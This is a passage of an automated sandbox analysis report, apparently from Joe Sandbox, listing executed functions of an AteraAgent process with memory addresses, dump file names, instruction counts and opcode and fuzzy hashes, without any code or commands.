                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab39d1d87553a3f458377a6e31628a72271db21085c01a1bf842812a0c444b7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0443160DA454FE358BA38D0A55E137D0DF46219B1405BBD08DCA1A7EE25A8828385
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B604B78 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 324036046b385c13efc2429df581508075e49803d3811e4cfd3edc1e6a562dd9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 37dea2f2333a8c0836ad4ce1d269b5644e9bd14df7b46dd854a414f8c7e54a69
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 324036046b385c13efc2429df581508075e49803d3811e4cfd3edc1e6a562dd9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0E231709A094FE794BA39C0595A173D1EF9A355B1105BBD40DCA2B5ED26F8828385
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B606E93 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 57b05956c02021be0578b202ba6c04855f744095daa175d76f9bc3a4ab95245f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA00202BCB46E01D45420DF79520D9B644C786171BC66572ED5D8815A988E2AD60285

                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C9BD Relevance: 2.4, Strings: 1, Instructions: 1107COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: qG_
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2083655345
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 219846975542bca63577f25ee1403e7a113c9c51d9c5ffa9766130ead92f59cf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 265e9cf5f736c6b4a1f07eaa3d183e77ce6bd4a7ba66ebd6f51ffc430b0a713d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 219846975542bca63577f25ee1403e7a113c9c51d9c5ffa9766130ead92f59cf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0729070B09A4D8FDBA4EF5CC4A5AA977E2FFA9344F050279E45DDB2A1CA24F841C740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B643870 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: J_H
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-326533465
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f1c0feeaeb39cef11713ce1a7307e790c62ef17e26def04696308d44470f8b6f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ce8355c6475e777172a71401b9788b00f6102cb2a36e3f9b0699df9193d5ff21
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1c0feeaeb39cef11713ce1a7307e790c62ef17e26def04696308d44470f8b6f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C22F621B0EF4A4FE7799A6848753757BE2EF56300F1641BED0AACB1E3DD2879428341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83E2FA Relevance: 1.4, Instructions: 1378COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ed48ef5cc9915cad69ffc4d13f119dcfbb7df5fd92eb5cd9f14bc865da7f8ae
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6116ea2ee7e5487bb449e498d542cd7dd15df1fd0ba5005a41e32156bd0d4c89
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ed48ef5cc9915cad69ffc4d13f119dcfbb7df5fd92eb5cd9f14bc865da7f8ae
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3192C431709A4E4FEBA8EB6CC464B7577D2EF98301F0504BAE05EC72A6DE28BC458751
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B620C58 Relevance: 1.2, Instructions: 1232COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bd84d67aaec8a3e5164650992225c53b574ebe9734dc8c97f7eac896b5d0df74
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bd2074e2db3f626f61caf910e9837e4735289568b6029ce98705778c5561a320
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd84d67aaec8a3e5164650992225c53b574ebe9734dc8c97f7eac896b5d0df74
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B23D70A0955D8FEBA9EF18C4A4BA9B7B1FF59304F1041F9D01ED7296CA35AA81CF10
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83AC97 Relevance: 1.0, Instructions: 957COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ddd3d498d30109eb27748b7113329094622b58b2ae0cb62a7c8c67821e5428c2
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c1eb614321adbf24a43979e5f0ca1726adeb063731ee8552124ea2e78e7fe2d5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddd3d498d30109eb27748b7113329094622b58b2ae0cb62a7c8c67821e5428c2
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D62B430B0D94E4FEB99EB688465AA877E2EF99304F1501B9D04DCB3DBCE34AC428741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63C910 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 24dd1d51b4f8aeb3fe9b6a97e9991ebb6cc7dd1bd84e3cb23a03773de5041c53
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 60c248c78b177350fdee242a3aa1b650c371d0b2bc946fcad53890b8f001c7d3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24dd1d51b4f8aeb3fe9b6a97e9991ebb6cc7dd1bd84e3cb23a03773de5041c53
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9C1C231B09A4D4FDF94EF6CC865AA93BE1FF69350B0501BAE45DD72A2CA24F941C780
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B641BEE Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d40fc57106d8d8e28a66ab154d831ce951c56649fa0e222199af412f6fcf48da
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f474f81f857429f18eed366a7281f187fa79b53d60fdd0fdbff4cae3e586bc0f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d40fc57106d8d8e28a66ab154d831ce951c56649fa0e222199af412f6fcf48da
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FD1953060DF898FD759DB28C050AA2BFE1FF65300F0586AED49A8B2A2DE34F545CB51
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B830435 Relevance: 2.4, Strings: 1, Instructions: 1136COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: WVSH
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4131290416
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cf92b496ea353b1d902964b57d89714248c3c5722a5153d3d6524c65c08c9e44
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 89fd0f0c67bd89b43764d84eecb6f9c35310414b8cd7326894f1ef4b3e4c2979
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf92b496ea353b1d902964b57d89714248c3c5722a5153d3d6524c65c08c9e44
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9382F531B2DB8A8FD7A8DB688464B69B7E1FF98700F1505B9D04DC72A6DE34F8428741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63D304 Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: dK_H
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2901103952
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70606bb6ac7cb4706580d5a063f9730d193285cf326e20d5d419f454035fb4a9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 538aa308c95347480793c350393eb5479593e2cdea5002053226a732305b41c1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70606bb6ac7cb4706580d5a063f9730d193285cf326e20d5d419f454035fb4a9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A12E53070DA494FD769EB28C4A46B57BE1FF95300F0541BAD49ECB2A6CE34B946C781
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B633B18 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b8b4c161e5523561435494aa35a7788743ac2574e9559b2760258092b8c86b1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 38b34c09ffb4049291ffc71e149dd0cb0abaf25d6ce9a901d1e4de13b395449c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b8b4c161e5523561435494aa35a7788743ac2574e9559b2760258092b8c86b1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CD11131B1CB494BD728EB58D4915B5B3E0FF95314B1446BED09EC72A6CE36F8428B81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B6303C5 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: abc936b0a6ea1ac40c0198f207b0d68df30ded82daa702a5f15bd8e89d647253
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a446ee3ba8b1b5cdebe743c3ef0202a590588597c7913a3219242822b11c1d30
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abc936b0a6ea1ac40c0198f207b0d68df30ded82daa702a5f15bd8e89d647253
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63B1F33071DB098FD768DB08D491639B3E1FF99710B144A7DD09AC76AADA35F8438B81
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B830468 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: AWAV
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-7688948
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 588593781f5df02e3194cada6f4eb6bedadb54108f0344de402a310959ba0dbf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 95925b665e87183e4b529e9797213664ffc914f4a7cd0cc59f22e240889c2f08
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 588593781f5df02e3194cada6f4eb6bedadb54108f0344de402a310959ba0dbf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1A1B530A2DF8D8FD7A8EB688054BA9B7E0FF59300F1505B9D49DC72A2DE34E8458741
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B63FA29 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: BK_H
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-699573682
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e1da840a510d9b6d2963a0d04ee4e9683bc3bcc178114bd9ff3aa70bf5d49e7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 11d2e683d049fbb2593c9908981984aac7182c27f28081bf55e70e5ead0f6bfc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1da840a510d9b6d2963a0d04ee4e9683bc3bcc178114bd9ff3aa70bf5d49e7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57A1F671A09A8D4FDB95DFAC88A46A97BF1FF59300F0501B6E459CB2A6CA34BD06C740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62A0A0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: 'R_L
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-835780197
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a3749530159fb82018a51c0d1988aa3f6ef9708fade2aa44b8d131e6d49b39f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01bedab47f472d42de0de2cd31f63d4ef2d2fd95b57076bc1a6a6f1fb86d1008
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a3749530159fb82018a51c0d1988aa3f6ef9708fade2aa44b8d131e6d49b39f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA711321B09D4D0FEBA8EB6C9469A3837D2EFD935070502BAE45DC72E7ED24BD428341
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B62D0B8 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: ^L_^
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3269914177
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: daeee4366d46ae5fc320e35e15716b9458a33e0531ecfb53fb70c87db9b3daa0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 21e6afb031dcf89d36b280085dc98d90063bde0424a391613b340be4f7786d76
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daeee4366d46ae5fc320e35e15716b9458a33e0531ecfb53fb70c87db9b3daa0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C451A522B0D7964FD346A77CA8761E83BA0DF4223574941F7C1D9CE0E7EA18284AC396
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83B2AE Relevance: 1.3, Instructions: 1321COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e4bfb853b7a00438ca4e3daab624bb4d8a46d93250674fcdb913b81847e9701f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 968fb8ee20137c39ee79d2e1f9e9eebc4de1106f8ee9a6e2f9e57815e57ac46c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bfb853b7a00438ca4e3daab624bb4d8a46d93250674fcdb913b81847e9701f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9292C530B19E4E8FDB99EB6884A1AA577E1FF59300B1541B9D44ECB29BCE34F942C740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B831A1C Relevance: 1.0, Instructions: 968COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e50c554b7994c42da66fb248bb437d5dd17db656cdcd99113c5f3add8c7a9ea3
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8a2e28b2cb30a1f8045bf5e46996ba43daf1bfb78eea10e9d2758898863a790
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e50c554b7994c42da66fb248bb437d5dd17db656cdcd99113c5f3add8c7a9ea3
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D162C430B09A4E8FEBA8EB588461A6477A2FF99744F5541B9D00DC72DACE35FD82C740
                                                                                                                                                                                                                                                                                                                                    Function 00007FFD9B83725D Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 36ed67d318b542a572018b9ab77b983a5b46d161cd5e35d2e03aa905a67ad044
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 23298b5ce45a5f9217834dda0cf63ca6d90b24d151795596af978414b6d23bd5
